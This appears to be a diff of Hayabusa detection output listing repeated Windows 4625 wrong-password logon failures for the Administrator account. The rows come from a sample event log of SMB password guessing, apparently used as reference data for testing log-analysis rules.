+2016-09-20 01:52:31.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8KJmYytO30Icc6Rb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.962 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zro3jLjFXWZ2o8VL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:31.999 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2Z2J8VYeuxd9fKcG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.048 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pXMjOKLfMex7OmMv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cgbm3YeoGxCa22Il | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b7MEstBFjiWhVE18 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.176 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Y8Y2kDEiMZWf0znn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.213 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zBAFVgPIOyCvtdRs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.253 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s3pFhUcspF6lzQXN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.297 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39LFXXW715pQoADC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.341 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: in4ewyxouUnxQzCQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.374 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: zOtV8CLIU6Mcw2ty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.412 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b8NJqimhGrg9uhTh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.457 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XEWLTOY9magV0h6L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.497 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Di1MZsJx52Bi8E6k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.536 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 22MdB2QodynfibkF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qojej3YITXvXJ6Pe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:32.618 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CLjbQ6timbdQoufd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.653 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aZgoAnGEFwXN88bQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.698 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NZFWoL9XUMJdfNnY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.747 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x000TRnXfVtPAQSE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HNHWWHDOpXQyNdrR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1irbPdOoUfvq1MXd | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dCflbKOMPJRXQHsD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.942 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zuy6nD4EXeGzEy5e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:32.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Xkig4u0LIS9v3HMK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 94RbUrUcMf6VhP8A | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X9f7wCJ3wI9RmZTL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: LkVs1viGo4RxhFaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OKMLt6t01vUDDq1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xYSif8ADOkC8aInB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EpmraSe2sxFVupTy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VPtfy3AxXpt9D3bx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tRMOrE0Ba983q0Jv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jQ0nkyTAeJt3dCpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n2fdsRMU9SMm1KpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3kliEPBsbsYNI7yG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9gEKFGsRvvlzulxR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5M6oUbT8LvS7JNCq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E4dxHwRQVR7iBWa1 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VRygirU257VfFcR5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6H6i0wkjvWkU6cmp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: W4Nh7bYfVvx30hVF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GQEsO4GpVjO5xpRh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: c9ZlpSBwq0tLAgzm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 65Piip53B1AiSBqb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Bh7SfuheoykW7Aym | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tWdm76C4nL6tkU0Z | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u2WEqTrg3A760Axt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyqhXspTlWwVCwA3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4rkidbQJmvQr35Jg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zr92VsL1YgHVehnL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rQP1K9rHrOyL0TOc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LR783q3o34oLQLTI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6NCTNhcghRGWf1qi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CVJdStLdKDbUICyB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: luAoVhEj1rOgZBfp | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OrqmovxoEEjLCaYV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AIP4mDSVhM27IAIP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cym5lXDK01XuJz2b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7pYXA1Ic6BOfG31o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: b722QrTSVoZGfiK8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: NzRFz4L7dpar794B | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pLWuw9eMN9rqm0Ic | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sE7pzfiKRfOb2dH5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YxL1cV8OiFVRfj4I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qHs8Z8XPLg58jZ1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6kRLlJt3Oxwhdgq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s4kTwriHAKVsTqzB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jfitpZ5ZrzBfpNf6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NdcU6ypEEeIAugGI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jIMfGIU1pHasO88g | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHsxKEQK7CWSqprp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QkC70klP6mv8YZrN | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
